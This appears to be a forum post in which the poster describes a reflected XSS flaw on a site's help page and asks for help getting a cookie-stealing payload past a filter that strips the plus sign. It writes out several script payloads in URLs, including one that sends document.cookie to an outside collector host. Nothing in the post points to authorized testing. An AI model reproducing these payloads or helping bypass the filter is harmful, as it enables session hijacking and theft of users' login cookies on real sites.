Hi All,
I have a problem with a site that seems vulnerable to XSS!
[tt]http://www.site.com/help/topic.php?&topic_name=<script>alert(document.cookie)</script>[/tt]
The above will display the details of the login cookie. However, I can’t get the following to work:
This however:
[tt]http://www.site.com/help/topic.php?&topic_name=<script>document.location="http://www.mycookiecatcher.com?c="+document.cookie</script>[/tt]
Won't work!
I’ve tried converting it to HEX etc. Nothing seems to work. Am I doing something wrong are there security features in modern browsers that prevent this?
When I view the HTML source however, I notice something interesting:
[tt]<script>document.location="http://www.mycookiecatcher.com/c.php?c=" document.cookie</script>[/tt]
It would appear to have filtered out the plus (+) symbol? When I type the URL:
[tt] www.site.com/help/topic.php?&topic_name=<script>document.location="www.mycookiecatcher.com?c="+document.cookie</script> [/tt]
into my browser and hit go, I get a javascript error. It says that it says it expected a semicolon.
I would imagine this relates to the plus symbol being filtered? I have tried to convert to HEX but I get the same problem. Is there anything else I can do.
Thanks,
S.
